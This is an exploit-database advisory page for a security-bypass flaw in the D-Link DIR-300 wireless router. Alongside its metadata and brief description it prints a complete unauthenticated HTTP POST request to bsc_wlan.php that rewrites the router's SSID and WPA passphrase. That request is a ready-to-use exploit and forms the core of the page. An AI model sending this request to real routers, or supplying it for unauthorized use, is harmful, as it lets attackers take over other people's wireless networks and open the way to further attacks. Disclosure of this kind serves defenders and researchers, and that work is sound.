D-Link DIR-300 Wireless Router Security Bypass Vulnerability

vendor:

DIR-300 Wireless Router

by:

Unknown

7.5

CVSS

HIGH

Security Bypass

Unknown

CWE

Product Name: DIR-300 Wireless Router

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Unknown

CPE: Unknown

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

D-Link DIR-300 Wireless Router Security Bypass Vulnerability

Remote attackers can exploit this issue to modify the WiFi key and possibly other configuration settings. Successful exploits will lead to other attacks.

Mitigation:

Unknown

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/45038/info

The D-Link DIR-300 wireless router is prone to a security-bypass vulnerability.

Remote attackers can exploit this issue to modify the WiFi key and possibly other configuration settings. Successful exploits will lead to other attacks. 

POST http://www.example.com/bsc_wlan.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml
Accept-Charset: ISO-8859-1,utf-8
Keep-Alive: 115
Proxy-Connection: keep-alive

Content-Type: application/x-www-form-urlencoded
Content-Length: 1000

ACTION_POST=final&f_enable=1&f_wps_enable=1&f_ssid=KingGeorgeV&f_channel=6&f_auto_channel=0&f_super_g=&f_xr=&f_txrate=0&f_wmm_enable=0&f_ap_hidden=0&f_authentication=7&f_cipher=2&f_wep_len=&f_wep_format=&f_wep_def_key=&f_wep=&f_wpa_psk_type=1&f_wpa_psk=
<<the_wifi_password_here>>&f_radius_ip1=&f_radius_port1=&f_radius_secret1=